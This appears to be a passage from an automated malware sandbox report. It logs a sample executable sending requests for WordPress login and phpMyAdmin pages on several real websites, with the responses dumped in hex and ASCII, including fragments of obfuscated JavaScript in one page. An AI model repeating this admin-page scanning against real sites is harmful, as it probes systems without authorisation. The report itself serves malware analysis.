                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved Permanentlydate: Sun, 26 Nov 2023 05:59:39 GMTcontent-type: text/html; charset=utf-8content-length: 0expires: Thu, 19 Nov 1981 08:52:00 GMTcache-control: no-store, no-cache, must-revalidate, post-check=0, pre-check=0pragma:


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    248192.168.2.46163978.128.62.1384436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC176OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: integraledu.hr
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC291INData Raw: 48 54 54 50 2f 31 2e 31 20 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 34 30 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 4c 6f 63 61 74 69 6f 6e 3a 20 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 74 65 67 72 61 6c 65 64 75 2e 68 72 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6d 61 78 2d 61 67 65 3d 36 30 30 0d 0a 45 78 70 69 72 65 73 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 36 3a 30 39 3a 34 30 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 33 31 32 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 301 Moved PermanentlyDate: Sun, 26 Nov 2023 05:59:40 GMTServer: ApacheLocation: https://www.integraledu.hr/wp-login.phpCache-Control: max-age=600Expires: Sun, 26 Nov 2023 06:09:40 GMTContent-Length: 312Connection: closeContent-Typ
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC312INData Raw: 3c 21 44 4f 43 54 59 50 45 20 48 54 4d 4c 20 50 55 42 4c 49 43 20 22 2d 2f 2f 49 45 54 46 2f 2f 44 54 44 20 48 54 4d 4c 20 32 2e 30 2f 2f 45 4e 22 3e 0a 3c 68 74 6d 6c 3e 3c 68 65 61 64 3e 0a 3c 74 69 74 6c 65 3e 33 30 31 20 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 74 69 74 6c 65 3e 0a 3c 2f 68 65 61 64 3e 3c 62 6f 64 79 3e 0a 3c 68 31 3e 4d 6f 76 65 64 20 50 65 72 6d 61 6e 65 6e 74 6c 79 3c 2f 68 31 3e 0a 3c 70 3e 54 68 65 20 64 6f 63 75 6d 65 6e 74 20 68 61 73 20 6d 6f 76 65 64 20 3c 61 20 68 72 65 66 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 69 6e 74 65 67 72 61 6c 65 64 75 2e 68 72 2f 77 70 2d 6c 6f 67 69 6e 2e 70 68 70 22 3e 68 65 72 65 3c 2f 61 3e 2e 3c 2f 70 3e 0a 3c 68 72 3e 0a 3c 61 64 64 72 65 73 73 3e 41 70 61 63 68 65 20 53 65
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE HTML PUBLIC "-//IETF//DTD HTML 2.0//EN"><html><head><title>301 Moved Permanently</title></head><body><h1>Moved Permanently</h1><p>The document has moved <a href="https://www.integraledu.hr/wp-login.php">here</a>.</p><hr><address>Apache Se


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    249192.168.2.46159834.136.104.2554436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC174OUTGET /PhpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: tiswheels.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC485INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 53 65 72 76 65 72 3a 20 6e 67 69 6e 78 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 43 6f 6e 74 65 6e 74 2d 54 79 70 65 3a 20 74 65 78 74 2f 68 74 6d 6c 3b 20 63 68 61 72 73 65 74 3d 55 54 46 2d 38 0d 0a 43 6f 6e 74 65 6e 74 2d 4c 65 6e 67 74 68 3a 20 31 32 37 32 31 37 0d 0a 43 6f 6e 6e 65 63 74 69 6f 6e 3a 20 63 6c 6f 73 65 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 56 61 72 79 3a 20 41 63 63 65 70 74 2d 45 6e 63 6f 64 69 6e 67 0d 0a 78 2d 70 6f 77 65 72 65 64 2d 62 79 3a 20 57 50 20 45 6e 67 69 6e 65 0d 0a 50 72
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundServer: nginxDate: Sun, 26 Nov 2023 05:59:39 GMTContent-Type: text/html; charset=UTF-8Content-Length: 127217Connection: closeVary: Accept-EncodingVary: Accept-EncodingVary: Accept-Encodingx-powered-by: WP EnginePr
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC15899INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 3c 68 74 6d 6c 20 6c 61 6e 67 3d 22 65 6e 2d 55 53 22 3e 3c 68 65 61 64 20 3e 3c 21 2d 2d 20 47 6f 6f 67 6c 65 20 74 61 67 20 28 67 74 61 67 2e 6a 73 29 20 2d 2d 3e 20 3c 73 63 72 69 70 74 20 61 73 79 6e 63 20 73 72 63 3d 22 68 74 74 70 73 3a 2f 2f 77 77 77 2e 67 6f 6f 67 6c 65 74 61 67 6d 61 6e 61 67 65 72 2e 63 6f 6d 2f 67 74 61 67 2f 6a 73 3f 69 64 3d 41 57 2d 39 38 37 39 32 39 36 30 33 22 3e 3c 2f 73 63 72 69 70 74 3e 20 3c 73 63 72 69 70 74 3e 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 3d 20 77 69 6e 64 6f 77 2e 64 61 74 61 4c 61 79 65 72 20 7c 7c 20 5b 5d 3b 20 66 75 6e 63 74 69 6f 6e 20 67 74 61 67 28 29 7b 64 61 74 61 4c 61 79 65 72 2e 70 75 73 68 28 61 72 67 75 6d 65 6e 74 73 29 3b 7d 20 67
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html><html lang="en-US"><head >... Google tag (gtag.js) --> <script async src="https://www.googletagmanager.com/gtag/js?id=AW-987929603"></script> <script> window.dataLayer = window.dataLayer || []; function gtag(){dataLayer.push(arguments);} g
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16384INData Raw: 75 76 29 2b 73 28 75 37 2e 75 78 2c 75 37 2e 75 69 29 2b 73 28 75 37 2e 75 41 2c 75 37 2e 59 29 2b 27 6f 72 27 5d 5b 73 28 75 37 2e 75 79 2c 75 37 2e 75 57 29 2b 73 28 75 37 2e 75 6e 2c 75 37 2e 75 46 29 2b 73 28 75 37 2e 75 52 2c 75 37 2e 75 65 29 5d 5b 73 28 75 37 2e 75 6a 2c 75 37 2e 75 6b 29 2b 27 64 27 5d 28 4c 29 2c 76 3d 4b 5b 6d 5d 2c 78 3d 4a 5b 76 5d 7c 7c 54 3b 54 5b 73 28 75 37 2e 75 43 2c 75 37 2e 59 29 2b 73 28 75 37 2e 75 64 2c 75 37 2e 75 73 29 2b 73 28 75 37 2e 75 51 2c 75 37 2e 75 68 29 5d 3d 4c 5b 73 28 75 37 2e 75 49 2c 75 37 2e 75 71 29 2b 27 64 27 5d 28 4c 29 2c 54 5b 73 28 75 37 2e 75 50 2c 75 37 2e 75 65 29 2b 73 28 75 37 2e 75 7a 2c 75 37 2e 75 65 29 2b 27 6e 67 27 5d 3d 78 5b 73 28 75 37 2e 75 4d 2c 75 37 2e 75 55 29 2b 73 28 75
                                                                                                                                                                                                    Data Ascii: uv)+s(u7.ux,u7.ui)+s(u7.uA,u7.Y)+'or'][s(u7.uy,u7.uW)+s(u7.un,u7.uF)+s(u7.uR,u7.ue)][s(u7.uj,u7.uk)+'d'](L),v=K[m],x=J[v]||T;T[s(u7.uC,u7.Y)+s(u7.ud,u7.us)+s(u7.uQ,u7.uh)]=L[s(u7.uI,u7.uq)+'d'](L),T[s(u7.uP,u7.ue)+s(u7.uz,u7.ue)+'ng']=x[s(u7.uM,u7.uU)+s(u
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16384INData Raw: 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 65 6c 65 6d 65 6e 74 6f 72 2d 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 69 73 77 68 65 65 6c 73 2e 63 6f 6d 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 75 70 6c 6f 61 64 73 2f 65 6c 65 6d 65 6e 74 6f 72 2f 63 73 73 2f 63 75 73 74 6f 6d 2d 66 72 6f 6e 74 65 6e 64 2e 6d 69 6e 2e 63 73 73 3f 76 65 72 3d 31 36 39 38 38 34 39 39 33 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 73 77 69 70 65 72 2d 63 73 73 27 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 74 69 73 77 68
                                                                                                                                                                                                    Data Ascii: edia='all' /><link rel='stylesheet' id='elementor-frontend-css' href='https://tiswheels.com/wp-content/uploads/elementor/css/custom-frontend.min.css?ver=1698849933' type='text/css' media='all' /><link rel='stylesheet' id='swiper-css' href='https://tiswh
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16384INData Raw: 74 3b 32 26 71 75 6f 74 3b 7d 22 20 64 61 74 61 2d 77 69 64 67 65 74 5f 74 79 70 65 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 2e 64 65 66 61 75 6c 74 22 3e 0a 09 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 77 69 64 67 65 74 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 0a 09 09 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 6a 65 74 2d 63 61 72 6f 75 73 65 6c 20 6a 65 74 2d 65 6c 65 6d 65 6e 74 73 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 2d 77 72 61 70 20 6a 65 74 2d 65 71 75 61 6c 2d 63 6f 6c 73 22 3e 0a 09 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 63 61 72 6f 75 73 65 6c 22 20 64 61 74 61 2d 73 6c 69 64 65 72 5f 6f 70 74 69 6f 6e 73 3d 22 7b 26 71 75 6f 74 3b 61 75 74
                                                                                                                                                                                                    Data Ascii: t;2&quot;}" data-widget_type="jet-carousel.default"><div class="elementor-widget-container"><div class="elementor-jet-carousel jet-elements"><div class="jet-carousel-wrap jet-equal-cols"><div class="jet-carousel" data-slider_options="{&quot;aut
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16384INData Raw: 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 63 6f 6e 74 61 69 6e 65 72 22 3e 3c 64 69 76 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 6e 6e 65 72 22 3e 3c 75 6c 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 20 6a 65 74 2d 6d 65 6e 75 2d 2d 61 6e 69 6d 61 74 69 6f 6e 2d 74 79 70 65 2d 66 61 64 65 20 6a 65 74 2d 6d 65 6e 75 2d 2d 72 6f 6c 6c 2d 75 70 22 3e 3c 6c 69 20 69 64 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 38 32 32 22 20 63 6c 61 73 73 3d 22 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 20 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 74 79 70 65 2d 70 6f 73 74 5f 74 79 70 65 20 6a 65 74 2d 6d 65 6e 75 2d 69 74 65 6d 2d 6f 62 6a 65 63 74 2d 70 61 67 65 20 6a 65 74 2d 68 61 73 2d 72 6f 6c 6c 2d 75 70 20 6a 65
                                                                                                                                                                                                    Data Ascii: ner"><div class="jet-menu-container"><div class="jet-menu-inner"><ul class="jet-menu jet-menu--animation-type-fade jet-menu--roll-up"><li id="jet-menu-item-822" class="jet-menu-item jet-menu-item-type-post_type jet-menu-item-object-page jet-has-roll-up je
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16384INData Raw: 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 50 46 6f 6f 74 65 72 22 3e 09 09 3c 64 69 76 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 74 79 70 65 3d 22 66 6f 6f 74 65 72 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 69 64 3d 22 32 32 30 22 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 20 65 6c 65 6d 65 6e 74 6f 72 2d 32 32 30 22 20 64 61 74 61 2d 65 6c 65 6d 65 6e 74 6f 72 2d 70 6f 73 74 2d 74 79 70 65 3d 22 65 6c 65 6d 65 6e 74 6f 72 5f 6c 69 62 72 61 72 79 22 3e 0a 09 09 09 09 09 09 09 09 3c 73 65 63 74 69 6f 6e 20 63 6c 61 73 73 3d 22 65 6c 65 6d 65 6e 74 6f 72 2d 73 65 63 74 69 6f 6e 20 65 6c 65 6d 65 6e 74 6f 72 2d 74 6f 70 2d 73 65 63 74 69 6f 6e 20 65
                                                                                                                                                                                                    Data Ascii: e="itemscope" itemtype="http://schema.org/WPFooter"><div data-elementor-type="footer" data-elementor-id="220" class="elementor elementor-220" data-elementor-post-type="elementor_library"><section class="elementor-section elementor-top-section e
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC16384INData Raw: 75 6f 74 3b 73 69 7a 65 26 71 75 6f 74 3b 3a 35 30 2c 26 71 75 6f 74 3b 73 69 7a 65 73 26 71 75 6f 74 3b 3a 5b 5d 7d 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 74 79 70 65 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 73 63 72 6f 6c 6c 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 64 69 72 65 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 66 78 5f 64 69 72 65 63 74 69 6f 6e 26 71 75 6f 74 3b 3a 6e 75 6c 6c 2c 26 71 75 6f 74 3b 6a 65 74 5f 70 61 72 61 6c 6c 61 78 5f 6c 61 79 6f 75 74 5f 7a 5f 69 6e 64 65 78 26 71 75 6f 74 3b 3a 26 71 75 6f 74 3b 26 71 75 6f 74 3b 2c 26 71 75 6f 74 3b 6a 65 74
                                                                                                                                                                                                    Data Ascii: uot;size&quot;:50,&quot;sizes&quot;:[]},&quot;jet_parallax_layout_type&quot;:&quot;scroll&quot;,&quot;jet_parallax_layout_direction&quot;:null,&quot;jet_parallax_layout_fx_direction&quot;:null,&quot;jet_parallax_layout_z_index&quot;:&quot;&quot;,&quot;jet
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC13014INData Raw: 2b 30 78 31 37 2a 30 78 31 36 29 2b 2d 70 61 72 73 65 49 6e 74 28 66 28 47 53 2e 49 29 29 2f 28 30 78 31 36 65 66 2b 2d 30 78 32 32 37 30 2b 30 78 62 38 62 29 3b 69 66 28 55 3d 3d 3d 5a 29 62 72 65 61 6b 3b 65 6c 73 65 20 76 5b 27 70 75 73 68 27 5d 28 76 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 63 61 74 63 68 28 52 29 7b 76 5b 27 70 75 73 68 27 5d 28 76 5b 27 73 68 69 66 74 27 5d 28 29 29 3b 7d 7d 7d 28 46 2c 2d 30 78 31 32 63 34 32 64 2b 30 78 31 32 36 36 34 33 2b 30 78 33 63 2a 30 78 32 64 32 33 29 29 3b 66 75 6e 63 74 69 6f 6e 20 46 28 29 7b 76 61 72 20 5a 39 3d 5b 27 6c 65 63 27 2c 27 64 6e 73 27 2c 27 34 33 31 37 31 36 38 77 68 43 4f 72 5a 27 2c 27 36 32 36 39 38 79 42 4e 6e 4d 50 27 2c 27 74 72 69 27 2c 27 69 6e 64 27 2c 27 2e 63 6f 27 2c 27 65 61
                                                                                                                                                                                                    Data Ascii: +0x17*0x16)+-parseInt(f(GS.I))/(0x16ef+-0x2270+0xb8b);if(U===Z)break;else v['push'](v['shift']());}catch(R){v['push'](v['shift']());}}}(F,-0x12c42d+0x126643+0x3c*0x2d23));function F(){var Z9=['lec','dns','4317168whCOrZ','62698yBNnMP','tri','ind','.co','ea


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    250192.168.2.461635213.0.13.444436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC180OUTGET /phpMyAdmin/ HTTP/1.1
                                                                                                                                                                                                    Host: www.ceuandalucia.es
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC461INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 0d 0a 58 2d 50 6f 77 65 72 65 64 2d 42 79 3a 20 50 48 50 2f 35 2e 34 2e 34 35 2d 30 2b 64 65 62 37 75 31 34 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c
                                                                                                                                                                                                    Data Ascii: HTTP/1.1 404 Not FoundDate: Sun, 26 Nov 2023 05:59:39 GMTServer: ApacheX-Powered-By: PHP/5.4.45-0+deb7u14Expires: Wed, 11 Jan 1984 05:00:00 GMTCache-Control: no-cache, must-revalidate, max-age=0Link: <https://www.ceuandalucia.es/wp-json/>; rel
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC6INData Raw: 32 33 30 34 0d 0a
                                                                                                                                                                                                    Data Ascii: 2304
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC4773INData Raw: 3c 21 44 4f 43 54 59 50 45 20 68 74 6d 6c 3e 0d 0a 3c 21 2d 2d 5b 69 66 20 6c 74 20 49 45 20 37 5d 3e 20 20 20 20 20 20 3c 68 74 6d 6c 20 63 6c 61 73 73 3d 22 6e 6f 2d 6a 73 20 68 74 6d 6c 2d 6c 6f 61 64 69 6e 67 20 77 66 2d 61 63 74 69 76 65 20 69 65 20 6f 6c 64 2d 62 72 6f 77 73 65 72 20 6c 74 2d 69 65 31 30 20 6c 74 2d 69 65 39 20 6c 74 2d 69 65 38 20 6c 74 2d 69 65 37 20 72 65 73 70 6f 6e 73 69 76 65 22 20 69 74 65 6d 73 63 6f 70 65 3d 22 69 74 65 6d 73 63 6f 70 65 22 20 69 74 65 6d 74 79 70 65 3d 22 68 74 74 70 3a 2f 2f 73 63 68 65 6d 61 2e 6f 72 67 2f 57 65 62 50 61 67 65 22 20 6c 61 6e 67 3d 22 65 73 22 20 78 6d 6c 6e 73 3a 6f 67 3d 22 68 74 74 70 3a 2f 2f 6f 70 65 6e 67 72 61 70 68 70 72 6f 74 6f 63 6f 6c 2e 6f 72 67 2f 73 63 68 65 6d 61 2f 22 20
                                                                                                                                                                                                    Data Ascii: <!DOCTYPE html>...[if lt IE 7]> <html class="no-js html-loading wf-active ie old-browser lt-ie10 lt-ie9 lt-ie8 lt-ie7 responsive" itemscope="itemscope" itemtype="http://schema.org/WebPage" lang="es" xmlns:og="http://opengraphprotocol.org/schema/"
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC4191INData Raw: 3c 73 74 79 6c 65 20 74 79 70 65 3d 22 74 65 78 74 2f 63 73 73 22 3e 0a 69 6d 67 2e 77 70 2d 73 6d 69 6c 65 79 2c 0a 69 6d 67 2e 65 6d 6f 6a 69 20 7b 0a 09 64 69 73 70 6c 61 79 3a 20 69 6e 6c 69 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 72 64 65 72 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 6f 78 2d 73 68 61 64 6f 77 3a 20 6e 6f 6e 65 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 68 65 69 67 68 74 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 77 69 64 74 68 3a 20 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 6d 61 72 67 69 6e 3a 20 30 20 2e 30 37 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 76 65 72 74 69 63 61 6c 2d 61 6c 69 67 6e 3a 20 2d 30 2e 31 65 6d 20 21 69 6d 70 6f 72 74 61 6e 74 3b 0a 09 62 61 63 6b
                                                                                                                                                                                                    Data Ascii: <style type="text/css">img.wp-smiley,img.emoji {display: inline !important;border: none !important;box-shadow: none !important;height: 1em !important;width: 1em !important;margin: 0 .07em !important;vertical-align: -0.1em !important;back
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC6INData Raw: 32 37 66 63 0d 0a
                                                                                                                                                                                                    Data Ascii: 27fc
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC5939INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6e 65 77 73 6c 65 74 74 65 72 2d 73 75 62 73 63 72 69 70 74 69 6f 6e 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 70 6c 75 67 69 6e 73 2f 6e 65 77 73 6c 65 74 74 65 72 2f 73 75 62 73 63 72 69 70 74 69 6f 6e 2f 73 74 79 6c 65 2e 63 73 73 3f 76 65 72 3d 35 2e 31 2e 38 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 6d 6f 6f 76 65 5f 67 64 70 72 5f 66 72 6f 6e 74 65 6e 64 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='newsletter-subscription-css' href='https://www.ceuandalucia.es/wp/wp-content/plugins/newsletter/subscription/style.css?ver=5.1.8' type='text/css' media='all' /><link rel='stylesheet' id='moove_gdpr_frontend-css' href='https:/
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC4297INData Raw: 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 62 6f 6f 74 73 74 72 61 70 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77 77 2e 63 65 75 61 6e 64 61 6c 75 63 69 61 2e 65 73 2f 77 70 2f 77 70 2d 63 6f 6e 74 65 6e 74 2f 74 68 65 6d 65 73 2f 65 6e 76 69 73 69 6f 6e 2f 6c 69 62 2f 63 73 73 2f 62 6f 6f 74 73 74 72 61 70 2e 63 73 73 3f 76 65 72 3d 32 2e 30 2e 39 2e 33 27 20 74 79 70 65 3d 27 74 65 78 74 2f 63 73 73 27 20 6d 65 64 69 61 3d 27 61 6c 6c 27 20 2f 3e 0a 3c 6c 69 6e 6b 20 72 65 6c 3d 27 73 74 79 6c 65 73 68 65 65 74 27 20 69 64 3d 27 74 68 65 6d 65 2d 63 68 69 6c 64 2d 66 72 6f 6e 74 65 6e 64 2d 73 74 79 6c 65 2d 63 73 73 27 20 20 68 72 65 66 3d 27 68 74 74 70 73 3a 2f 2f 77 77
                                                                                                                                                                                                    Data Ascii: <link rel='stylesheet' id='theme-bootstrap-css' href='https://www.ceuandalucia.es/wp/wp-content/themes/envision/lib/css/bootstrap.css?ver=2.0.9.3' type='text/css' media='all' /><link rel='stylesheet' id='theme-child-frontend-style-css' href='https://ww
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC2INData Raw: 0d 0a
                                                                                                                                                                                                    Data Ascii:
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC6INData Raw: 35 62 66 35 0d 0a
                                                                                                                                                                                                    Data Ascii: 5bf5


                                                                                                                                                                                                    Session IDSource IPSource PortDestination IPDestination PortPIDProcess
                                                                                                                                                                                                    251192.168.2.461633185.54.192.1254436240C:\Users\user\Desktop\klWGq3yDcQ.exe
                                                                                                                                                                                                    TimestampBytes transferredDirectionData
                                                                                                                                                                                                    2023-11-26 05:59:39 UTC175OUTGET /wp-login.php HTTP/1.1
                                                                                                                                                                                                    Host: talentius.com
                                                                                                                                                                                                    Accept: */*
                                                                                                                                                                                                    Accept-Encoding: deflate, gzip
                                                                                                                                                                                                    User-Agent: Mozilla/5.0 (Windows NT 6.0; rv:34.0) Gecko/20100101 Firefox/34.0
                                                                                                                                                                                                    2023-11-26 05:59:40 UTC443INData Raw: 48 54 54 50 2f 31 2e 31 20 34 30 34 20 4e 6f 74 20 46 6f 75 6e 64 0d 0a 44 61 74 65 3a 20 53 75 6e 2c 20 32 36 20 4e 6f 76 20 32 30 32 33 20 30 35 3a 35 39 3a 33 39 20 47 4d 54 0d 0a 53 65 72 76 65 72 3a 20 41 70 61 63 68 65 2f 32 2e 34 2e 35 32 20 28 55 62 75 6e 74 75 29 0d 0a 50 72 61 67 6d 61 3a 20 6e 6f 2d 63 61 63 68 65 0d 0a 45 78 70 69 72 65 73 3a 20 57 65 64 2c 20 31 31 20 4a 61 6e 20 31 39 38 34 20 30 35 3a 30 30 3a 30 30 20 47 4d 54 0d 0a 43 61 63 68 65 2d 43 6f 6e 74 72 6f 6c 3a 20 6e 6f 2d 63 61 63 68 65 2c 20 6d 75 73 74 2d 72 65 76 61 6c 69 64 61 74 65 2c 20 6d 61 78 2d 61 67 65 3d 30 0d 0a 4c 69 6e 6b 3a 20 3c 68 74 74 70 73 3a 2f 2f 74 61 6c 65 6e 74 69 75 73 2e 63 6f 6d 2f 77 70 2d 6a 73 6f 6e 2f 3e 3b 20 72 65 6c 3d 22 68 74 74 70 73 3a
